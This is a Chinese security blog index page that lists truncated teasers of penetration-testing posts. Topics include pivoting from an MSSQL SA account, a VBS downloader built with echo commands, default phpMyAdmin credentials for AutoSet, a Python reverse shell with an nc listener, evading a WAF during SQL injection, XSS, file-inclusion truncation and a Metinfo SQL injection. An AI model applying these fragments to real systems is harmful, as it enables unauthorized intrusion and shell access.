安全博客 - 第 852 | CN-SEC 中文网

站库分离sa权限环境下的渗透测试思路

SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出) 一、DB机有公网IP. 1:执行命令把系统防火墙和ip策略停止,netstat -an找到3...

05月19日颓废's Blog702 views评论

阅读全文

站库分离情况的渗透思路（MSSQL）

DOS命令：（一条一条执行） echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs echo Set She...

05月19日颓废's Blog849 views1

阅读全文

颓废's Blog

韩国AutoSet建站程序漏洞实战

在zoomeye搜索autoset 随便选择目标左侧栏默认口令:root/autoset 登录phpmyadmin拿shell

05月19日1,300 views评论

阅读全文

韩国AutoSet建站程序漏洞0day

phpmyadmin登录账号密码随意输入登录

05月19日颓废's Blog865 views评论

阅读全文

python弹shell脚本代码

nc -l 1234 注释版 #shell执行 python -c #用到subprocess库fork子进程并监听结束 #os.dup2函数将shell标准输入输出绑定到sock...

05月19日颓废's Blog565 views评论

阅读全文

SqlmapApi接口

@get(“127.0.0.1:8775/scan/<taskid>/log”) &...

05月19日颓废's Blog651 views评论

阅读全文

sql注入时，把网站注入死或被waf拦截ip的问题解决方法

sql注入时，把网站注入死或被waf拦截ip的问题是不是很操蛋旋转的代理服务器 1。爬行公共代理列表从互联网和另存为一个列表。 2。提供一个本地HTTP代理接口,转发你的每个请求...

05月19日颓废's Blog700 views评论

阅读全文

XSS攻击另类玩法

今天就来讲一下大家都熟悉的 xss漏洞的攻击利用。相信大家对xss已经很熟悉了，但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie。但是xss还有更多的花式玩法，...

05月19日颓废's Blog502 views评论

阅读全文

颓废's Blog

ajaxfile upload异步上传

首先引用js文件 //上传头像预览 $('.choosePic').on('change', '.UploadImg', function(){ &nb...

05月19日472 views评论

阅读全文

颓废's Blog

文件包含截断笔记

测试代码: <?php include $_GET['a'].'.php' ?> 2.txt内容: <?php phpinfo(); ?> 2.路径长度截断...

05月19日546 views评论

阅读全文

颓废's Blog

构造拿到网站权限（webshell）

我们在网址后面添加上一个“'”，提交后报错了，我又到网上下载了一套源码，查看了一下teachiist.asp文件的代码，具体代码我就不贴出来了。

05月19日527 views评论

阅读全文

颓废's Blog

Metinfo 5.3.17 前台SQL注入漏洞分析

Metinfo 8月1日升级了版本，修复了一个影响小于等于5.3.17版本（几乎可以追溯到所有5.x版本）的SQL注入漏洞。这个SQL注入漏洞不受软WAF影响，可以直接获取数据，影...

05月19日542 views评论

阅读全文

站库分离sa权限环境下的渗透测试思路

站库分离情况的渗透思路（MSSQL）

韩国AutoSet建站程序漏洞实战

韩国AutoSet建站程序漏洞0day

python弹shell脚本代码

SqlmapApi接口

sql注入时，把网站注入死或被waf拦截ip的问题解决方法

ajaxfile upload异步上传

文件包含截断笔记

构造拿到网站权限（webshell）

Metinfo 5.3.17 前台SQL注入漏洞分析

在线咨询

微信